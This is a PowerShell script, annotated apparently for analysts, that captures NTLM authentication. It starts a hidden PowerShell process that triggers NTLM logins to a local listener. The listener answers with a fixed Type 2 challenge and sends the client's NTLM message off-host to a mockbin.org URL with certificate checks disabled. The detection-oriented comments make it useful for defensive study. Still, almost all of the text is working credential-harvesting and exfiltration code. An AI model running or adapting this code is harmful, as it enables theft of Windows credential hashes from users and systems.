Original sending to Mockbin (use a new mockbin)
# Summary (for analysts): this script runs a local HTTP listener on port 8080,
# answers requests with an NTLM challenge, and contains a branch that sends the
# client's base64 NTLM message to an external mockbin.org URL.
#
# Observable behaviours useful for detection, all taken from the lines below:
#   - powershell.exe started with -WindowStyle hidden
#   - net use / dir against UNC paths of the form \\localhost@8080\...
#   - an HttpListener bound to http://localhost:8080/
#   - TLS certificate validation disabled via ServicePointManager
#   - outbound HTTPS GET to mockbin.org with a base64 string in the URL path

# Pre-built NTLM message returned to the client in the WWW-Authenticate header.
# The bytes start with the ASCII signature "NTLMSSP\0" followed by message
# type 0x00000002 (a Type 2 / challenge message). The 8 bytes
# 0x11..0x88 sit at the server-challenge position, so the challenge is a fixed,
# hard-coded value rather than a random one.
[byte[]]$NTLMType2 =
@(
0x4e,0x54,0x4c,0x4d,
0x53,0x53,0x50,0x00,
0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x28,0x00,0x00,
0x01,0x82,0x00,0x00,
0x11,0x22,0x33,0x44,
0x55,0x66,0x77,0x88,
0x00,0x00,0x00,0x00
)
# Launches a second PowerShell process with a hidden window. Its script block
# loops 10 times, running `net use` and `dir` against \\localhost@8080\...
# UNC paths. NOTE(review): the host@port UNC form is presumably resolved via
# WebDAV over HTTP, which would direct these requests at the listener created
# below; confirm against the Windows WebClient service behaviour.
start-process powershell.exe -WindowStyle hidden {
for ($var = 1; $var -le 10; $var++) {
net use f: \\localhost@8080\c$
dir \\localhost@8080\fg
}
}
# HTTP listener bound to the loopback prefix only, port 8080.
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/')
$listener.Start()
Write-Output 'Listening...'
# Flag guarding the forwarding branch below; initialised to $false.
$ntlmt2 = $false
# Request loop; there is no break in the code shown, so it runs until the
# process is terminated.
while ($true) {
# GetContext() blocks until a request arrives.
$context = $listener.GetContext()
$request = $context.Request
$response = $context.Response
# $hostip is assigned but not read anywhere in the code shown.
$hostip = $request.RemoteEndPoint
$headers = $request.Headers
# Response body is left empty.
$message = ''
foreach ($key in $headers.AllKeys) {
# -match is a regex test, so any header name containing 'Authorization'
# satisfies it; the value is then always read from the 'Authorization' header.
if ($key -match 'Authorization') {
[string[]]$values = $headers.GetValues('Authorization')
# Header value is split on whitespace; element 1 is taken as the base64
# NTLM message that follows the scheme name.
$NTLMAuthentication = $values[0] -split '\s+'
$NTLMType = $NTLMAuthentication[1]
# NOTE(review): $ntlmt2 is $false at initialisation and is only assigned
# inside this branch in the code shown, so this listing may not match a
# deployed sample exactly; confirm against the original.
if ($ntlmt2) {
# Prints the client address and the base64 NTLM message.
Write-Output $context.Request.RemoteEndPoint.Address.IPAddressToString
Write-Output $NTLMType
# Replaces the certificate validation callback with one that always returns
# $true, so certificate errors are ignored for the request on the next line.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# Sends the base64 NTLM message off-host by appending it to the path of an
# HTTPS GET to mockbin.org. The bin id is a placeholder in this listing.
(New-Object System.Net.WebClient).DownloadString('https://mockbin.org/bin/<EnterNewURLHERE>/' + $NTLMType)
$ntlmt2 = $true
}
# Reply with 401 and the fixed Type 2 challenge, base64-encoded after the
# 'NTLM ' scheme prefix, so the client continues the NTLM handshake.
$NTLMType2Response = 'NTLM ' + [Convert]::ToBase64String($NTLMType2)
$response.AddHeader('WWW-Authenticate', $NTLMType2Response)
$response.AddHeader('Content-Type','text/html')
$response.StatusCode = 401
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
continue
} else {
# For every header whose name does not match, advertise NTLM in the response.
$response.AddHeader('WWW-Authenticate', 'NTLM')
}
}
}
# Follows a while ($true) loop with no break in the code shown, so this line
# is not reached in this listing.
$listener.Stop()